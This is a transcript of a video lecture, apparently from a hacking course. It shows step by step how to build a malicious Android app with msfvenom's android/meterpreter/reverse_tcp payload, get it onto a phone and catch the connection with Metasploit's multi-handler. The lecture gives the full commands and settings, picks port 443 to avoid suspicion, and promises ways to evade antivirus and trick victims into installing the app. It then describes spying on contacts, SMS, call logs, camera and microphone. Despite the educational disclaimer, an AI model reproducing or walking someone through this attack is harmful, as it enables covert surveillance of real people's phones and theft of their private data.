This video is for educational purposes only. Please perform this knowledge ethically. Don't use this for malicious purposes.
In this lecture, we're gonna start with the first attack, which is creating a malicious Android app and convince the victim to install it on his Android devices. And once he installs the app on the device, we're gonna have a full access on his devices. Now, this attack will be done on phases. First, I'm gonna show you how the attack can be done and how can you get full access on the victim device. You can check the logs, the contacts, open the cam, open the mic. You can have full access on the device. Then I'm going to show you how to tune the attack. How can you change the icon so it or change the app so it will be merged with another regular app. How to convince the victim easily to install the app. So we're going to do that on phases. Now before we start, I just want to let you know that many people do not consider to install antivirus on their mobile or on their tablet. They only install that on their computers, which is completely wrong, because as you're going to see during this section, going through many attacks, how easy it is compromised. Even if you have an antivirus installed on the victim machine, still it can be bypassed. So let's see how. So the first step, we're going to go to the Kali Linux machine. And before we start, we need to make sure that Kali Linux are on the same network. This actually is a primary attack. On the first attack, I'm going to show you how to compromise a mobile that is on the same network. Later on, we're going to see how to compromise a remote mobile. So as I explained, this will be tuned and nothing will be related to the attack. It's all network setting. So first, let's see how to do that in a simple way. Then we're gonna tune it and we're gonna make it very, very realistic. Before starting the attack, I need to do the following. I need to go to the setting, manage and setting of my virtual machine. And I need to make sure that on the network adapter, it's on the same network. You have to select bridging. By default, the virtual machine has a NAT setting, but in this case, we're gonna use bridging. And to make sure that we are on the same network, we are going to open a terminal and check the IP of my Linux machine, which is 192.168.1.103, and I can check my mobile as well. If you don't know how to go to the setting of the mobile and check the IP, you can install an app. There is a nice app, it's called IP, like this one. It's a free app. Click on it, it will show you your public IP and your private IP. So in our case, our private IP is 192.168.1.104, which is on the same network. Both of them are starting with 192.168.1. and then 1.3 and 1.4. Then we need to create the fake app and add to the fake app the payload. Payload is a malicious code that will be executed on the victim machine. I wrote all the command on the text file. I will attach this file to the lecture, so you don't have to worry about memorizing the command. We're just going to write it down together. You can copy and paste, but let's write it down to explain it while we are writing down. So first command is msfvenom, and this is creating a payload. Then -p to create a payload. And then we're going to type the name of the payload. Android / meterpreter / reverse _ TCP. Now, since I already explained that in the Metasploit section, reverse TCP means that the victim will be connected to my machine, and this will bypass any router, firewall, any security setting, because the connection will be a reverse. While if you connect opposite, which is binding connection, most probably it's not very effective and any security will drop the connection. So the reverse TCP is much more effective. The meterpreter payload is a very, very powerful payload that will give you full access on the mobile device. Then I need to put the payload setting. I need to write down this payload will connect to which machine. So I'm gonna write here LHOST should be capital. You know that Linux is case sensitive, and then you can put the IP of your local machine, your Kali Linux machine, which is 192.168.1.103. Then numlock is off, so let me repeat it. msfvenom -p, then Android meterpreter, then refers _TCP, and then LHOST and equal, we're going to put the local IP, which is 192.16, not the victim IP, our IP, because most probably I will not be aware of the victim IP, .1.103. And then the local port, which is any connection need to be done through a specific port. I can put any port. It's better to use any port higher than 1024, but I'm going to use a port 443, which is the HTTPS port. And this because if someone is scanning the system and finds that the victim is connected through a device through a port 443, he will not suspect that this is a hacked device or that his device has been hacked, because this is a regular port that anyone can connect to. It is related to HTTPS service. Then capital R and then greater than. Greater than in Linux mean whatever output of that redirected to somewhere. And I'm going to write a name of the app. I'm going to name it app.apk. You can name whatever you want, game, app, anything you want, and click on it. Now this is a basic payload. It will be working in most of the device, but you can even make it more enhanced. You can encode it or encrypt it so the antivirus will not detect it if the victim has an antivirus on his mobile. So there is a lot of things that can be done to make this application very hard to detect. We're going to take later on in this section how to merge this application with one regular normal application. The application has been created, and he's saying that it can be encrypted, it can be, and this is the size, and where it will be saved. It will be saved on your home folder. If you go here to the file manager and go to your home, you should find the app.apk. So this is the first phase. Second, let's copy it to our mobile device. After creating the malicious app, the next step is to copy this app to the victim mobile. Now this can be done in different way. You can share a folder between Windows and Linux and copy them, or you can upload this app to any free hosting, or there is different way for doing that, and we're gonna explain later on some sophisticated way. But in my case, I take a copy from the app and I copy it on the desktop. And this is a fake app, because usually when you create it, by default it will be created inside your home folder. Then using Google Drive, I will upload this app. And the reason I copy it on the desktop, because I noticed that it will not be detected if you keep it on your home folder. So here he usually point to the desktop. This is my app, and I'm gonna create on open, and he's gonna start uploading the app. It's a very small one, so it has been uploaded successfully. Then let's go to my computer here, and let me download this app and copy it to my memory so this is the app. Copy, and I'm gonna add it to my memory card. Here you go. You can even add it to the mobile, it's not a problem. I will create a folder. It's better to do it this way. Do not keep it anywhere, just create a folder. I don't have I have a new folder here. I can use this one, new folder, paste, and now the malicious app, it's on my mobile. Now before installing the malicious app, I need to do something from the Linux machine, which is installing the handler. And what is exactly the handler? What happens is when you run the malicious app from the victim machine, he will try to connect to your Kali Linux machine. Now the sessions that will be coming from the mobile to the Kali Linux machine will try to reach the machine on port 443. So I have to open this port and run a listener that will wait for the app. So we're gonna do that. It has to be done for Metasploit. So all the steps are written in this file to run the handler, which will be used for receiving the connection from the victim once he runs this app. So we're gonna run msfconsole, msfconsole, and once it's up and running, we're gonna use the Metasploit, the multi-handler to expect a connection from the computer. I'm gonna specify the name of the payload and the port and the IP. So let's wait. It will take few seconds until it runs. Okay, meanwhile, let me activate the program that will be used, Mobizane, that allow me to connect to the computer. I have to run it from my mobile as well. Here you go. This is just to save time, because once we run the handler on the Kali machine, I'm gonna install the app here and we're gonna see if the attack will be successful or not. Okay. Usually showing an identification that I have to write in the machine. It's 627-175. It's a very easy application, and I already made a lecture on how to use it, so shouldn't be a problem. I think we are done. Let's see. Okay, now getting back to here. Excellent. The Metasploit has run. Now we're gonna need to use the exploit multi-handler. Here you go. So copy and paste it here. Excellent. Then we need to specify, it should be the same payload. Set payload Android meterpreter, reverse TCP. So you should use the exact same payload. Copy, paste. If any spelling mistakes or something, it will show. So it's Android meterpreter, yes. And once, yeah, right. Now we need to specify the option in this payload. If you are not able to memorize, you can type show options and it will show you in this specific payload what option you need to add. So as you can see, we need to add the LHOST, this is empty. We need to put the LPORT. By default is 4444, but in our case we change it to 443, so we need to change that. So let's do that. So set LHOST, and we're gonna write our local IP. Let me just make sure that we still have the same IP. It has, sorry about that. So let me check the IP of the machine, if it's still the same or change. ifconfig, it's the same. Okay, so set LHOST equal 192.168.1.103, and we need to change, I think it should be without equal. Here you go. Yep, and we need to change the LPORT as well to keep it the same way we created in the payload. LPORT, which is 443. Okay, now I believe nothing else is needed, so let's exploit. Let's run the handler by typing exploit, and the handler will run. So now, as you can see, he's listening and waiting for the connection. What I'm gonna do next, we will go to the mobile and I'll try to run this app. So I'll go to the file, it should be in the file manager. Where is it? Here you go, file manager, and in the SD card it was inside a new file, a folder by the name of new folder. Where is it? Yep, sorry, not this one. New folder, it should be, here you go, and this is the app. And of course you need to allow this option, that unknown source, otherwise it will not be installed. But later on you're gonna see that we can merge this one with another app that will manipulate this option and cannot be detected that it's something malicious, and install. And once the app is installed, let's see what happened to our Linux machine. So the app has been installed, and in our here machine we just need to give it a few seconds, and let's see what will happen. I'm gonna pause until it works, and we're gonna see how it will be connected. So once I open the application, as you can see, a meterpreter session has been opened between my machine and the victim machine, and here are the meterpreter session. And now I have full access on the mobile device. And if you need to know what can be done, you just need to type help, and you will see all the commands that you can do. You can see all the activity, you can see if this device is rooted or not. If it's rooted, actually you're gonna have more options. You can see the call logs, you can see the contact, you can see the SMS. It's an unbelievable application. Now next lecture I'm going to show you some of those commands that can be used, but actually nothing need to be explained. You just need to copy and paste those commands, and you can see how to use them. So as you can see, you can open the webcam, you can open the mic, everything can be done on the device once the app has been installed. It's quite interesting, and as we agree later on, we're going to see how to tune this attack, so it will be very hard to detect. Right now just it's the basic of the attack. So let's see the post attack.